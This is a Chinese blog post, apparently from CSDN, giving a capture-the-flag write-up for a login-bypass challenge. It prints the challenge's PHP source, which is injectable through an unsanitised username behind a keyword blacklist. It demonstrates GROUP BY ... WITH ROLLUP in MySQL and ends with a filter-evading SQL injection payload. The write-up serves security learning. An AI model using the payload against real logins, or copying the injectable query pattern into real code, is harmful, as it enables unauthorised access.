实验吧 因缺思汀的绕过 By Assassin(with rollup统计)

最新推荐文章于 2022-09-20 17:34:39 发布
最新推荐文章于 2022-09-20 17:34:39 发布
阅读量7.2k 收藏 3
点赞数 4
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35078631/article/details/54772798
版权

这个题目还是比较新鲜的,很久没回实验吧了学到了很多的姿势~不得不说不看提示真心想不到这些,嗯。

首先我们需要了解题目中php的工作原理,首先审源码得到了source.txt得到了源码,然后我们看一下源码干了什么,主要就是一个登陆认证!

<?php
error_reporting(0);

if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
    echo '<form action="" method="post">'."<br/>";
    echo '<input name="uname" type="text"/>'."<br/>";
    echo '<input name="pwd" type="text"/>'."<br/>";
    echo '<input type="submit" />'."<br/>";
    echo '</form>'."<br/>";
    echo '<!--source: source.txt-->'."<br/>";
    die;
}

function AttackFilter($StrKey,$StrValue,$ArrReq){  
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){   
        print "姘村彲杞借垷锛屼害鍙禌鑹囷紒";
        exit();
    }
}

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){ 
    AttackFilter($key,$value,$filter);
}

$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
    die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "浜﹀彲璧涜墖锛?";
    }
}else{
    print "涓€棰楄禌鑹囷紒";
}
mysql_close($con);
?>

可以看到主要是
$filter = “and|select|from|where|union|join|sleep|benchmark|,|(|)”;
这句话过滤了很多关键词,加上function AttackFilter这个函数起到了过滤的作用,这里是巧妙地用了select过程中​​用group by with rollup这个统计的方法进行插入查询。我们用mysql做几个小实验就明白这个是怎么用的了!

mysql> create table test (
    -> user varchar(100) not null,
    -> pwd varchar(100) not null);  
mysql>insert into test values("admin","mypass");
mysql>select * from test group by pwd with rollup
mysql> select * from test group by pwd with rollup;
+-------+------------+
| user  | pwd        |
+-------+------------+
| guest | alsomypass |
| admin | mypass     |
| admin | NULL       |
+-------+------------+
3 rows in set

mysql> select * from test group by pwd with rollup limit 1
;
+-------+------------+
| user  | pwd        |
+-------+------------+
| guest | alsomypass |
+-------+------------+
mysql> select * from test group by pwd with rollup limit 1 offset 0
;
+-------+------------+
| user  | pwd        |
+-------+------------+
| guest | alsomypass |
+-------+------------+
1 row in set
mysql> select * from test group by pwd with rollup limit 1 offset 1
;
+-------+--------+
| user  | pwd    |
+-------+--------+
| admin | mypass |
+-------+--------+
1 row in set
mysql> select * from test group by pwd with rollup limit 1 offset 2
;
+-------+------+
| user  | pwd  |
+-------+------+
| admin | NULL |
+-------+------+
1 row in set

哎,然后我们就看到关键了,这个查询的时候可以想办法
让pwd变成空,而且user这一列用的却是也是存在的字段!
这就很好用了!又有if (mysql_num_rows($query) == 1)知道只要一列

然后我们构造payload
’ or 1=1 group by pwd with rollup limit 1 offset XX#
然后一个试出来就行啦。涨姿势!
这是第二届北京网络安全技术大赛夺旗赛Writeup(Web安全篇)​的一个题目

Assassin__is__me
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
因缺思汀绕过
Gunther的博客
08-18 597
http://www.shiyanbar.com/ctf/1940 因缺思汀绕过 访问解题链接去访问题目,可以进行答题。根据web题一般解题思路去解答此题。看源码,请求,响应等。提交与题目要求一致的内容即可返回flag。然后提交正确的flag即可得分。web题主要考察SQL注入,XSS等相关知识。涉及方向较多。 此题主要涉及源码审计,MySQL相关的知识。 flag格式 CTF{
一些因缺思汀的小实验1
08-03
一些因缺思汀的小实验不同代码实现方式效率上的差异TEST1 使用new和delete的常数开销与Buffer开销的对比TEST2 使用指针跳转和数组跳转的常数对
CTF-实验因缺思汀绕过
才不是小弱鸡的博客
05-07 483
web题嘛,第一步肯定是看源码。f12后发现这样一些奇怪的东东接下来肯定是打开这个文件嘛打开后就看到了php源码啦(是不是很开心!)分析一下源码可以看到这里过滤了一些sql语句(嗯,这些东西接下来不能用了)这里的意思大概是选择操作的数据库为db(数据库看不到QAQ)然后将咱们输入的uname在数据库查询uname和key,再将key和咱们输入的pwd比对,相等就打印flag。然后就要用一个注入的小...
实验吧-因缺思汀绕过
一个安全研究员
07-21 493
如题
springboot_gradle.zip
05-22
这些都是Java开发中不可或缺的知识点,对于理解和实践现代Web应用的开发有着重要的指导意义。通过学习和实践这些内容,开发者能够提升项目构建效率,优化数据库操作,同时提供清晰的API文档,以及实现高效的分页查询...
因缺思汀绕过(CTF)
qq_22192367的博客
03-26 487
题目链接:http://ctf5.shiyanbar.com/web/pcat/index.php 老规矩,先看源码,发现可以看到后台代码; 打开进行代码审计,关键代码如下: 代码大意:关键字过滤;第二部分代码从数据库中取出uname,确保取出的数据 只有一行,最后取出的pwd与提交的pwd相比较,相同则输出flag; 思路:利用group by pwd with rollu...
CTF题库>因缺思汀绕过
qq_42777804的博客
08-19 442
访问解题链接去访问题目,可以进行答题。根据web题一般解题思路去解答此题。看源码,请求,响应等。提交与题目要求一致的内容即可返回flag。然后提交正确的flag即可得分。web题主要考察SQL注入,XSS等相关知识。涉及方向较多。此题主要涉及源码审计,MySQL相关的知识。 flag格式 CTF{} 我们访问网站之后 出现这个 我们要先进行查看源码 发现了 sourc...
暑期练习web6:因缺思汀绕过实验吧) 代码审计 with rollup
qq_41618162的博客
08-13 347
题目的hint:主要涉及代码审计和mysql方面 解题链接: http://ctf5.shiyanbar.com/web/pcat/index.php 拿到题目,好吧,这题我完全没辙。。。, 查看一下源码: 这里结合了一下@GETF对源码的注释,对代码进行了一定的解读 &amp;amp;lt;?php error_reporting(0); if (!isset($_POST['uname'])...
东北大学长者社区系统源码
12-14
东北大学长着社区源码,欢迎大家下载借鉴,可以参考,直接盗用必究,辛苦熬夜肝的成果,劳烦大家珍惜,1490行的心血,u1si泪目,真的不容易,熬夜秃头,狗头保命
实验吧 who are you? By Assassin 时间盲注
Assassin
01-29 6792
说真的这是我第一次接触时间盲注,而且这还是简单的时间盲注…不过感觉题目还是有一定难度的。首先我们看到原始网页显示your ip is :xxx.xxx.xxx.xxx。然后可以联想是http头注入,当然了我之前只会X-FORWARDED-FOR,查看资料貌似还可以用:Client-IP x-remote-IP x-originating-IP x-remote-addr 但是这里当然是还是用X-FO
minio工具类,特别指出删除文件和删除文件夹
最新发布
weixin_46247525的博客
09-20 4620
minio文件上传工具类。
【CTF WriteUp】2020中央企业”新基建“网络安全技术大赛初赛Crypto题解
cccchhhh6819的博客
10-28 4355
Crypto Crypto_ezCrypto 观察密文,很像字母替换后的英文语法,但注意到其中有一段是.ubwbsjs,标点符号通常在后边,所以说明密文是颠倒的,首先反过来以后,尝试使用词频分析工具解码 发现明显不是人话,但是后边flag的base64加密的情况基本可以确定。将后边那几位固定为flag字符的base64编码Zxmh重新跑 经过一段时间后,得到的英文基本成为单词,采用方式也是ROT,但是注意到大写字母在语义中完全不对,所以猜测大写字母ROT的数值和小写字母不同,写程序爆破: #!/usr/bi
ctf中的php代码审计
qq_40273198的博客
05-04 2897
做ctf题时,遇到审计题时可能会遇到,翻翻记录可以很快的找到脑洞。1.PHP$flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'ctf{xxx}'; }...
实验吧-因缺思汀绕过WriteUp
焚卷觅光的博客
07-22 3062
实验吧-因缺思汀绕过WriteUp题目地址:http://www.shiyanbar.com/ctf/1940审计网页代码,发现有一个注释:<!--source: source.txt--> 访问同目录下的source.txt 发现登陆的逻辑代码,下面就可以针对它进行绕过。! 这里有三层限制0X00在第一层的filter里面就过滤了常用的SQL关键词,所以常规的SQL 注入就不行了。如
HITCTF2018-web全题解
蚁景网安学院
02-07 2844
点击蓝字关注我们前记最近参加了一下哈工大办的HITCTF,感觉题目可以学到知识,于是分享一下我的题解~01PHPreading发现文件泄露http://198.13.58.35:8899...
i春秋网络内生安全试验场CTF夺旗赛(第二季)部分wp
qq_42188168的博客
10-26 921
i春秋 2019-10月CTF答题夺旗赛 web部分wp 1.easyphp 通过观察可以发现img传参base64解码;同样的方法可得index.php源码 之后构造序列化。。。。。 2、calculate1,2 写wp前删掉了脚本,简述下:利用selenium运算公式并结合chromedriver进行10次提交 3、babysql 之后测试admin’orderby 1# 到3,直到4...
"文件实现方式效率小实验
这篇论述讨论了一些因缺思汀的小实验不同代码实现方式效率上的差异。作者首先对使用new和delete的常数开销与Buffer开销进行了对比实验,发现new的时间开销几乎是buffer的9倍,因为buffer的内存是连续的,而new的操作...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值